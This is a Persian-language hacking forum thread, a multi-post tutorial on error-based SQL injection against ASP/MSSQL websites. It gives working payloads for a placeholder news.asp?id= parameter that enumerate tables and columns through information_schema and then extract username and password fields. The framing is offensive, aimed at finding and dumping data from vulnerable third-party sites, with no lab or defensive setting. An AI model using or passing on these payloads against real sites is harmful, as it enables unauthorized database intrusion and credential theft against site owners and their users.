MR.MSA ارسال شده در آگوست 12 2020 گزارش اشتراک گذاری ارسال شده در آگوست 12 2020 با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری : به ادرس سایت ‘a را اضافه کنید . به این صورت : This is the hidden content, please ورود یا ثبت نام و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : This is the hidden content, please ورود یا ثبت نام روش دوم : This is the hidden content, please ورود یا ثبت نام و به جای x می توانید این مقادیر بزنید : user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم . واکنش ها : mbdev12، RT3N، mr.hacker-7 و 6 نفر دیگر 9 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
MR.MSA ارسال شده در آگوست 12 2020 نویسنده گزارش اشتراک گذاری ارسال شده در آگوست 12 2020 خب میریم سراغ مرحله ی بعدی یعنی بیرون کشیدن جداول (tables) بیرون کشیدن تیبل ها (asp) : and 1=(select top 1 table_name from information_schema.tables) مثال : Site.com/news.asp?id=5+and 1=(select top 1 table_name from information_schema.tables) خروجی : sadra ( نام یک تیبل را نشان می دهد برای بیشتر باید محدود سازی کنید ) محدود سازی تیبل ها (asp) و بدست اوردن تیبل های بعدی : and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘table 1’,’table 2’,’table 3’,’table 4’,’table 5’……’)) به جای تیبل ۱ تیبل ۲ و ... بیاید اولین نام تیبلی که بدست اوردید را بزنید و بعد نام دوم و نام سوم و تا آخر . یعنی خروجی دستور اول مثلا شد : sadra پس می شود به این صورت : Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’)) خروجی : ali ، نام تیبل دوم را به شما نشان می دهد و برای تیبل بعد : Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’,’ali’)) خروجی : amir ، نام تیبل سوم و باز هم به همین صورت پیش می روید : Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’,’ali’,’amir’ )) نکات مهم برای یادگیری بهتر : · همینطور به همین صورت پیش می روید تا جایی که تیبل مهم را بدست بی آورید . · شما دارید می گوییید تیبلی را به من نمایش بده که نام آن در لیست من نیست (not in) . · تا جایی بروید تا دیگر چیزی به شما نمایش ندهد و آن موقع است که تمام تیبل ها را بیرون کشیدید . ------------------- امید وارم از این آموزش راضی باشید و پست خوبی رو گذاشته باشم . در آموزش بعد می رویم سراغ بیرون کشیدن ستون ها . واکنش ها : johnjones، R3DN4X314، Drag-Stor و 4 نفر دیگر 6 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
MR.MSA ارسال شده در آگوست 12 2020 نویسنده گزارش اشتراک گذاری ارسال شده در آگوست 12 2020 در این قسمت همانطور که گفتم قصد دارم آموزش بیرون کشیدن ستون ها رو در سایت های asp بدهم . بیرون کشیدن ستون های یک تیبل : and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem’ ( به جای تیبل نیم مهم نام تیبل مهم خود را بنویسید . و مثلا خروجی این است : ID و برای ستون بعد این کار را می کنید : and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem’ and column_name not in (‘ID’)) و مثل بیرون کشیدن تیبل دارید می گویید ستونی را به من نشان بده که در لیست نیست بعد مثلا زمانی که دستور بالا را زدید خروجی می شود : user و برای ستون بعدی : and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem’ and column_name not in (‘ID’,’user’)) باز برای ستون های بعدی هم به همین صورت پیش می روید . بیشر نکات مثل بیرون کشیدن تیبل ها هست . ------------------- امید وارم از این آموزش راضی باشید و پست خوبی رو گذاشته باشم . در آموزش بعد می رویم سراغ بیرون کشیدن اطلاعات ستون ها (username و password) واکنش ها : R3DN4X314، MR.wIzArD، Drag-Stor و 4 نفر دیگر 6 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
MR.MSA ارسال شده در آگوست 12 2020 نویسنده گزارش اشتراک گذاری ارسال شده در آگوست 12 2020 سلام خدمت دوستان عزیز در این پست میریم سراغ بیرون کشیدن اطلاعات ستون ها (username و password) بیرون کشیدن اطلاعات ستون ها : +and+1=(select top 1 column name from table name ) به جای تیبل نیم نام تیبلی که می خواهید مثلا __user و به جای ستون نیم نام ستون مورد نظر را بنویسید . مثال : Site.com/news.asp?id=9+and+1=(select top 1 username from __user) واکنش ها : johnjones، mbdev12، R3DN4X314 و 2 نفر دیگر 4 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .